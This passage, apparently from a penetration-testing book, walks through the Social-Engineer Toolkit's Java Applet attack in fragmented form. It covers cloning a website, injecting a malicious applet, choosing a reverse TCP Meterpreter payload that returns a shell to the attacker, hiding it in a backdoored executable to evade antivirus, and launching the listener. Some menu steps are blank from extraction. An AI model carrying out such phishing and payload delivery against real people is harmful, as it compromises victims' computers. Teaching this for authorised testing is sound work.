background image


Chapter 10

SET supports both HTTP and HTTPS

 Enter the url to clone:

[*] Cloning the website:
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: 0xvV3cYfbLBI3
[*] Malicious java applet website prepped for deployment

To begin this attack scenario, select 

Website Attack Vectors

   from the 

SET main menu. Use the 

Java Applet Attack Method

  , and then choose 



   from the subsequent menu. Finally, tell SET to clone the SecManiac 

website  .

What payload do you want to generate:

Name:                                      Description:

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

 Enter choice (hit enter for default):


Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

16. Backdoored Executable (BEST)

 Enter your choice (enter for default):


[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?

Enter choice yes or no: 


Web Server Launched. Welcome to the SET Web Attack.

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...